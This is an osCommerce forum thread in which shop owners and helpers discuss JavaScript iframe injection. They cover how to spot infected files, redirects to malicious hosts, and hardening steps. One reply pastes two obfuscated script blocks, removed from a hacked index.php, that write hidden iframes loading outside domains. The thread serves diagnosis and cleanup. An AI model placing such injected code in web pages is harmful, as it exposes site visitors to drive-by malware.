Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Hacker warning


Jack_mcs

Recommended Posts

There is a hot new hacking attempt making the rounds lately called Javascript iframe injection. The hacker injects code into your files which they then use to try to obtain all sorts of information about your shop, server and your visitors computer. They probably can't get too much information on a properly setup server but there are a lot out there that are not setup properly.

 

Besides the above, one of the affects this code has is that it casues google to list your site with a message that says, "This site may harm your computer." Google is using the results of a company named stopbadware.org, which checks websites for this type of code. If they find it, they will then report it to google, who in turns adds the warning about your site. However, neither of them will notify the shop owner about it so your site could be infected and listed with a serious warning and you wouldn't know it until you noticed the listing on google.

 

To check if your site is infected, search your files for

- iframe (not used in most oscommerce shops)

- a line of code that starts with <script language="JavaScript">e

- a string of letters like AAAAAAAA

 

Any of the above could be in an oscommerce shop legitimately, although it is probably unlikely. If it is, then you need to look closer at the code to see if it belongs there. Keeping a known, good backup of your files on your computer to compare against is always a good idea.

 

Jack

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons

Link to comment
Share on other sites

  • Replies 51
  • Created
  • Last Reply

Thanks for the notice. I also recall there was one contribution that would email the store owner anytime a file has been changed. I couldn't quite locate it, but will keep looking.

Link to comment
Share on other sites

Installed Contributions: CCGV, Close Popup, Dynamic Meta Tags, Easy Populate, Froogle Data Feeder, Google Position, Infobox Header Entire Row, Live Support for OSC, PayPal Seal with CC images, Report_m Sales, Shop by Price Revised, SQL Updater, Who's Online Enhancement, Footer, GNA EP Assistant and still going.

Link to comment
Share on other sites

Can you give scenario of a bad setup where a hacker could inject codes into a file? Or could you list common gotchas to look out for that store owners should fix? Also, say if I am Joe Average with computers and I would just take the default install of Oscommerce over a default install of Linux without tinkering with any permission setting then would I be exposed to this new hacking attempt? Sorry for all this questions and how about the impact if the server would have PHP safe_mode turn on or off? Any info. would be useful...Thx! Tim

 

There is a hot new hacking attempt making the rounds lately called Javascript iframe injection. The hacker injects code into your files which they then use to try to obtain all sorts of information about your shop, server and your visitors computer. They probably can't get too much information on a properly setup server but there are a lot out there that are not setup properly.

 

Besides the above, one of the affects this code has is that it casues google to list your site with a message that says, "This site may harm your computer." Google is using the results of a company named stopbadware.org, which checks websites for this type of code. If they find it, they will then report it to google, who in turns adds the warning about your site. However, neither of them will notify the shop owner about it so your site could be infected and listed with a serious warning and you wouldn't know it until you noticed the listing on google.

 

To check if your site is infected, search your files for

- iframe (not used in most oscommerce shops)

- a line of code that starts with <script language="JavaScript">e

- a string of letters like AAAAAAAA

 

Any of the above could be in an oscommerce shop legitimately, although it is probably unlikely. If it is, then you need to look closer at the code to see if it belongs there. Keeping a known, good backup of your files on your computer to compare against is always a good idea.

 

Jack

Link to comment
Share on other sites

The default install of oscommerce, if downloaded from here, has many of the secruity holes patched so that's a good start. But there are many settings on the server that can leave it open to security breeches. I'm not sure what you mean by a default Linux install. Hopefully no host would use a default install. There are all sorts of injection techniques that will allow a hacker access. Many of those were fixed by the oscommerce patches and is the main reason for turing off register gobals. As for reasons and examples regarding the server, go to google and search for "Javascript iframe injection." You should also read through the stopbadware.org site. They may even have a support forum.

 

Jack

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons

Link to comment
Share on other sites

  • 2 months later...

Our research has shown a lot of this is relates to stolen ftp passwords.

 

There is PC based virus going around too that steals ftp passwords stored in ftp programs. I've seen a file listing about 50 site ftp addresses and it is rumoured such files are shared by hackers.

 

So it is not always a server based flaw that is leading the attack.

Link to comment
Share on other sites

So far all evidence points to ftp access without brute force. Meaning they somehow get the ftp passwords. It is an automated hack which will return unless you change your ftp password. Changing it appears to stop it which indicates that they don't in fact have real server access.

 

They attack all index programs. index.php .html .bak They have also started to attack login.php

 

We recommend the contribution Site Monitor as one way of knowing an attack has occured.

 

We have seen instances where they load a script such as phpremoteview (renamed so you won't recognize it). But it is not 100% clear what that aids.

Link to comment
Share on other sites

  • 4 months later...

ok guys, I think I got injected with some iframe crap that tries to redirect customers to this address: 217.107.218.147

 

I am currently running diagnostic on all my files and comparing them with previous backups done at different points in time. When I check the DOM of my home page. I shows an iframe entry redirecting to that malicious ip address above. Where should I go to look for that iframe entry. I checked the language files but with no success.

 

Any suggestions?

Link to comment
Share on other sites

Also, the injection worked but the redirecting does not happen. The clients do not get forwarded to that address. It seems I've done a fairly decent job at securing my oscommerce site. But the fact that its still there bothers me and makes me a little paranoid.

Link to comment
Share on other sites

The best thing to do is download your complete shop and search all of the files. The changes are usually in files in the root but they could be elsewhere.

 

Jack

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons

Link to comment
Share on other sites

I can't' find anything in my files pertaining to the address that is redirecting the browsers to 217.107.218.147

 

When I view my site with firefox that address appears at the bottom left but does not redirect. When I open with ie7, it redirects.

 

So I renamed my index.php and have a temporary out of service index.html in its place. And I am still being redirected. ( if my files were actually infected. Having renamed the index.php and replaced it with a very simple index.html should avoid traffic redirection right?)

 

I started to believe that this was a local infection either on the local network in my office (4 computers) or from the hosting company's network. None of my anti viruses/adware are detecting anything. My router log shows that every time I connect to my site, traffic is redirected to that malicious IP. But when I connect to other sites like google or starcraft.org, I do not get redirected. I believe this proves that my network in not at fault (well, I'm hoping here guys).

 

I have no idea where else to look. I'm going to do some research on this later tonight and see if may be its possible that my host is the one that is actually infected.

Link to comment
Share on other sites

If you Google that IP address you get a lot of info.

 

All the links seem to be 3 yrs. old though.

 

I read a few, and they said it's a server side infection via a JavaScript.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

I can't' find anything in my files pertaining to the address that is redirecting the browsers to 217.107.218.147
Many times the files/code the hackers load is encrypted so you can just search for something like an IP and find it each time.

 

Jack

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons

Link to comment
Share on other sites

I've googled the ip and looked up every possibilities mentioned in the search results as far as iframe injections through java, server exploits, and so on.

 

I searched my oscommerce files for anything/everything related to iframe, the ip in question or any malicious javascript code like jack mentioned in the first post and I did not find anything.

 

I really doubt its an iframe injection on my php files now. Unless I'm looking in the wrong places and for the wrong things. I am starting to lean towards a possible IE & firefox infection on the local network at work, maybe I have some die hard spyware that I just haven't caught yet. I'm at home now and can view the site just fine, I don't get redirected and don't experience any of the symptoms that I see when I'm at work. This is freaking mind boggling. Funny thing is right before I left work today, everything started working just fine. I'm going in tomorrow to look into it some more. It worries me that sh!t might not be set up properly.

Link to comment
Share on other sites

If you need any help checking for "spyware" and "browser hijacks" I can be of service.

 

I've got 4 years experience and almost 13,000 posts at a popular spyware removal forum helping people with such problems.

 

I was a "Teacher" there for a while teaching others the "tricks of the trade".

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

  • 1 month later...

I've just received an email today from Google Search Quality, I was unsure of its authenticity until I searched this site and found this thread. this is part of the email: Dear site owner or webmaster of xxxxxxx.co.uk

 

We recently discovered that some of your pages can cause users to be

infected with malicious software. We have begun showing a warning page

to users who visit these pages by clicking a search result on

Google.com.

 

I've xxxxx'd out my website address as I wouldn't want anyones computer infected by anything by visiting my site.

 

I'm completely clueless when it comes to this but I'm going through all my php files to see if I can find anything suspicious. I had noticed for a few days prior to receiving this email when visiting my site it would hang for ages and I had to keep closing down and restarting, I should have realised something was wrong then :-" :angry:

 

I've brought up my website several times and opened various pages and all seems ok and is running ok so I'm not sure if there is still a problem or not ?

Link to comment
Share on other sites

Update:

 

just tried to bring my site up on IE (usually use FF) and my site freezes, in the bottom left hand side it says; waiting for http://froz-soft.net/j3/index.php... no idea what this is?

 

I also get a pop up on the top of the page that says; this website wants to run the following add-on: microsoft data access - remote data services dat' from microsoft corporation - if you trust the website and the add-on and want to allow it to run, click here

 

I'm afraid I have real issues with my site and hope someone cant offer some advice, assistance with this

 

Many thanks

Link to comment
Share on other sites

I've just located and removed these 2 instances of codes in index.php which looked suspicious

 

<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"><!-- o65 --><script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0027\u0068\

u0074\u0074\u0070\u003a\u002f\u002f\u0067\u006f\u006c\u0075\u006d\u002e\u0069\u006e\u0066\u006f\u002f\u0027\u0020\u0077\u0069\

u0064\u0074\u0068\u003d\u0027\u0031\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0031\u0027\u0020\u0073\

u0074\u0079\u006c\u0065\u003d\u0027\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020\u0068\u0069\

u0064\u0064\u0065\u006e\u003b\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script><!-- c65 -->

<!-- header //-->

 

<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074

\u0074\u0070\u003a\u002f\u002f\u0073\u0074\u0061\u0074\u002d\u0067\u006f\u006f\u0067\u006c\u0065\u002e\u0063\u006f\u006d\u002f\u0063

\u006f\u0075\u006e\u0074\u0065\u0072\u002f\u006f\u0075\u0074\u002e\u0070\u0068\u0070\u003f\u0073\u005f\u0069\u0064\u003d\u0031\u0022

\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0022\u0020\u0062\u006f\u0072\u0064\u0065

\u0072\u003d\u0022\u0030\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074

\u003d\u0022\u0030\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0020

\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u003b\u0020\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020

\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020\u006e\u006f\u006e\u0065

\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>

Link to comment
Share on other sites

Update:

 

just tried to bring my site up on IE (usually use FF) and my site freezes, in the bottom left hand side it says; waiting for http://froz-soft.net/j3/index.php... no idea what this is?

 

I also get a pop up on the top of the page that says; this website wants to run the following add-on: microsoft data access - remote data services dat' from microsoft corporation - if you trust the website and the add-on and want to allow it to run, click here

 

I'm afraid I have real issues with my site and hope someone cant offer some advice, assistance with this

 

Many thanks

This is the typical result of a hack like I originaly mentioned. You should remove any code that is not right. That can be difficult to know what it is but what you found in index.php is suspicious, to say the least. You can also use your cpanel or admin filemanagers to look at the datestamps. Changed files may show up this way. Also look in any directories that are writeable, like pub and tmp, for scripts that are not part of the shop.

 

Jack

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons

Link to comment
Share on other sites

This is the typical result of a hack like I originaly mentioned. You should remove any code that is not right. That can be difficult to know what it is but what you found in index.php is suspicious, to say the least. You can also use your cpanel or admin filemanagers to look at the datestamps. Changed files may show up this way. Also look in any directories that are writeable, like pub and tmp, for scripts that are not part of the shop.

 

Jack

 

Thanks Jack,

 

I've found the codes in login.php too and removed those, my site still freezes in IE so there's obviously more problems so I'm slowly and thoroughly going through all files and folders.

Link to comment
Share on other sites

Your ongoing problem is - how did they get the code into the site in the first place?

 

Until you know that they'll be able to do it again and your work will be wasted.

 

1. Change all user names and passwords, including the db user (don't forget the configure.php file entries).

 

2. Make sure your site uses at least osCommerce 2.2 MS2 (060817), and if it doesn't then upgrade.

 

3. Make sure that no folder has permissions above 755. If your hosting requires permissions of 777 on folders then move hosting.

 

4. Delete the filemanager.php file from your osCommerce admin panel.

 

5. Rename the 'admin' folder to something unique (not 'admin2' or 'newadmin'), and then change the entries for /admin/ in admin/includes/configure.php to /new_name/

 

6. Password Protect the renamed 'admin' folder with a new user and password.

 

6. Run a full virus scan, Malware and SpyBot scan on your PC and any PC which is used to FTP files to the site - as this may be the source of the injection.

 

Vger

Link to comment
Share on other sites

Your ongoing problem is - how did they get the code into the site in the first place?

 

Until you know that they'll be able to do it again and your work will be wasted.

 

1. Change all user names and passwords, including the db user (don't forget the configure.php file entries).

 

2. Make sure your site uses at least osCommerce 2.2 MS2 (060817), and if it doesn't then upgrade.

 

3. Make sure that no folder has permissions above 755. If your hosting requires permissions of 777 on folders then move hosting.

 

4. Delete the filemanager.php file from your osCommerce admin panel.

 

5. Rename the 'admin' folder to something unique (not 'admin2' or 'newadmin'), and then change the entries for /admin/ in admin/includes/configure.php to /new_name/

 

6. Password Protect the renamed 'admin' folder with a new user and password.

 

6. Run a full virus scan, Malware and SpyBot scan on your PC and any PC which is used to FTP files to the site - as this may be the source of the injection.

 

Vger

 

Hi Vger,

 

I'm completely at a loss to how access was gained, all files where/are set to 755. I've even found the codes in admin/index.php. Admin is and always has been password protected through cpanel so I'm thrown by that one?

 

I've gone through all files/folders and deleted all instances of codes that look suspicious but I think theres something else somewhere and I can't for the life of me see what or where!

 

Don't know if this makes any difference of not but my main site has a dedicated IP and a have a another site i'm building hosted on my server with non dedicted IP but they've managed to get the codes into but sites in the same files.

 

I'll now do all you've suggested and just hope I can clear up this mess!

 

Many thanks for your help

Link to comment
Share on other sites

Unfortunately cPanel has no jailed root and is exploited around 3-4 times a year - so when a new cPanel exploit is about and the server hasn't yet been patched they can get into any site via the server.

 

By the way, I hope it was a typo on your part but files should not be 755, only folders. Files should be 644.

 

Vger

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...